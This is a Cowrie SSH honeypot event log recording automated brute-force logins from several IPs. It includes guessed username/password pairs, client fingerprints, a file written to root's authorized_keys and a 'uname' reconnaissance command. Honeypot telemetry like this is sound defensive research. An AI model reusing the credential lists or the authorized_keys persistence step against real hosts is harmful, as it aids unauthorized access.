{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T19:59:27.967617Z","src_ip":"199.195.248.191","session":"e282a3758ed3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:59:27.968529Z","src_ip":"199.195.248.191","session":"e282a3758ed3"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":46846,"dst_ip":"1.2.3.4","dst_port":22,"session":"039f94e97c28","protocol":"ssh","message":"New connection: 199.195.248.191:46846 (1.2.3.4:22) [session: 039f94e97c28]","sensor":"my-vps","timestamp":"2025-08-26T19:59:28.053156Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:59:28.059789Z","src_ip":"199.195.248.191","session":"039f94e97c28"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:59:28.145398Z","src_ip":"199.195.248.191","session":"039f94e97c28"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T19:59:28.493637Z","src_ip":"199.195.248.191","session":"039f94e97c28"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:59:29.594841Z","src_ip":"199.195.248.191","session":"039f94e97c28"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":47554,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b66b05af0a3","protocol":"ssh","message":"New connection: 199.195.248.191:47554 (1.2.3.4:22) [session: 3b66b05af0a3]","sensor":"my-vps","timestamp":"2025-08-26T19:59:29.679944Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:59:29.682266Z","src_ip":"199.195.248.191","session":"3b66b05af0a3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:59:29.776307Z","src_ip":"199.195.248.191","session":"3b66b05af0a3"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:59:30.135075Z","src_ip":"199.195.248.191","session":"3b66b05af0a3"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:59:30.228439Z","src_ip":"199.195.248.191","session":"e282a3758ed3"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:59:30.229399Z","src_ip":"199.195.248.191","session":"3b66b05af0a3"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":46522,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b68822482a6","protocol":"ssh","message":"New connection: 217.154.1.158:46522 (1.2.3.4:22) [session: 4b68822482a6]","sensor":"my-vps","timestamp":"2025-08-26T19:59:40.968104Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:59:40.969071Z","src_ip":"217.154.1.158","session":"4b68822482a6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:59:40.983295Z","src_ip":"217.154.1.158","session":"4b68822482a6"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T19:59:41.029197Z","src_ip":"217.154.1.158","session":"4b68822482a6"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:59:42.045162Z","src_ip":"217.154.1.158","session":"4b68822482a6"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":39628,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac178374b56c","protocol":"ssh","message":"New connection: 217.154.1.158:39628 (1.2.3.4:22) [session: ac178374b56c]","sensor":"my-vps","timestamp":"2025-08-26T19:59:58.381708Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:59:58.383656Z","src_ip":"217.154.1.158","session":"ac178374b56c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:59:58.398136Z","src_ip":"217.154.1.158","session":"ac178374b56c"}
{"eventid":"cowrie.login.failed","username":"default","password":"1","message":"login attempt [default/1] failed","sensor":"my-vps","timestamp":"2025-08-26T19:59:58.441165Z","src_ip":"217.154.1.158","session":"ac178374b56c"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:59:59.457359Z","src_ip":"217.154.1.158","session":"ac178374b56c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59262,"dst_ip":"1.2.3.4","dst_port":22,"session":"80ef70ebf7a2","protocol":"ssh","message":"New connection: 212.227.235.229:59262 (1.2.3.4:22) [session: 80ef70ebf7a2]","sensor":"my-vps","timestamp":"2025-08-26T20:00:03.631933Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T20:00:03.633883Z","src_ip":"212.227.235.229","session":"80ef70ebf7a2"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T20:00:03.742757Z","src_ip":"212.227.235.229","session":"80ef70ebf7a2"}
{"eventid":"cowrie.login.failed","username":"admin","password":"optiplex","message":"login attempt [admin/optiplex] failed","sensor":"my-vps","timestamp":"2025-08-26T20:00:04.258973Z","src_ip":"212.227.235.229","session":"80ef70ebf7a2"}
{"eventid":"cowrie.login.failed","username":"admin","password":"opopop","message":"login attempt [admin/opopop] failed","sensor":"my-vps","timestamp":"2025-08-26T20:00:05.369774Z","src_ip":"212.227.235.229","session":"80ef70ebf7a2"}
{"eventid":"cowrie.login.failed","username":"admin","password":"omerta","message":"login attempt [admin/omerta] failed","sensor":"my-vps","timestamp":"2025-08-26T20:00:06.514187Z","src_ip":"212.227.235.229","session":"80ef70ebf7a2"}
{"eventid":"cowrie.login.failed","username":"admin","password":"olives","message":"login attempt [admin/olives] failed","sensor":"my-vps","timestamp":"2025-08-26T20:00:07.624652Z","src_ip":"212.227.235.229","session":"80ef70ebf7a2"}
{"eventid":"cowrie.login.failed","username":"admin","password":"nutella","message":"login attempt [admin/nutella] failed","sensor":"my-vps","timestamp":"2025-08-26T20:00:08.735338Z","src_ip":"212.227.235.229","session":"80ef70ebf7a2"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:00:09.846164Z","src_ip":"212.227.235.229","session":"80ef70ebf7a2"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":40856,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1e2c7e06a3e","protocol":"ssh","message":"New connection: 217.154.1.158:40856 (1.2.3.4:22) [session: a1e2c7e06a3e]","sensor":"my-vps","timestamp":"2025-08-26T20:00:16.149153Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:00:16.149857Z","src_ip":"217.154.1.158","session":"a1e2c7e06a3e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:00:16.164244Z","src_ip":"217.154.1.158","session":"a1e2c7e06a3e"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"tomcat","message":"login attempt [tomcat/tomcat] failed","sensor":"my-vps","timestamp":"2025-08-26T20:00:16.212175Z","src_ip":"217.154.1.158","session":"a1e2c7e06a3e"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:00:17.228220Z","src_ip":"217.154.1.158","session":"a1e2c7e06a3e"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":44826,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7b745495d31","protocol":"ssh","message":"New connection: 199.195.248.191:44826 (1.2.3.4:22) [session: f7b745495d31]","sensor":"my-vps","timestamp":"2025-08-26T20:00:29.130535Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:00:29.135925Z","src_ip":"199.195.248.191","session":"f7b745495d31"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T20:00:29.232994Z","src_ip":"199.195.248.191","session":"f7b745495d31"}
{"eventid":"cowrie.login.failed","username":"letmein","password":"123456","message":"login attempt [letmein/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T20:00:29.613169Z","src_ip":"199.195.248.191","session":"f7b745495d31"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:00:30.707636Z","src_ip":"199.195.248.191","session":"f7b745495d31"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":60186,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5dc359a5676","protocol":"ssh","message":"New connection: 217.154.1.158:60186 (1.2.3.4:22) [session: c5dc359a5676]","sensor":"my-vps","timestamp":"2025-08-26T20:00:33.584569Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:00:33.585561Z","src_ip":"217.154.1.158","session":"c5dc359a5676"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:00:33.600046Z","src_ip":"217.154.1.158","session":"c5dc359a5676"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"gitlab123","message":"login attempt [gitlab/gitlab123] failed","sensor":"my-vps","timestamp":"2025-08-26T20:00:33.644033Z","src_ip":"217.154.1.158","session":"c5dc359a5676"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:00:34.660404Z","src_ip":"217.154.1.158","session":"c5dc359a5676"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":42686,"dst_ip":"1.2.3.4","dst_port":22,"session":"d35fe52e5a52","protocol":"ssh","message":"New connection: 217.154.1.158:42686 (1.2.3.4:22) [session: d35fe52e5a52]","sensor":"my-vps","timestamp":"2025-08-26T20:00:51.192699Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:00:51.193626Z","src_ip":"217.154.1.158","session":"d35fe52e5a52"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:00:51.208382Z","src_ip":"217.154.1.158","session":"d35fe52e5a52"}
{"eventid":"cowrie.login.success","username":"root","password":"!Qaz@Wsx","message":"login attempt [root/!Qaz@Wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:00:51.252973Z","src_ip":"217.154.1.158","session":"d35fe52e5a52"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:00:51.366180Z","src_ip":"217.154.1.158","session":"d35fe52e5a52"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T20:00:51.366897Z","src_ip":"217.154.1.158","session":"d35fe52e5a52"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:00:51.382526Z","src_ip":"217.154.1.158","session":"d35fe52e5a52"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:00:51.383613Z","src_ip":"217.154.1.158","session":"d35fe52e5a52"}
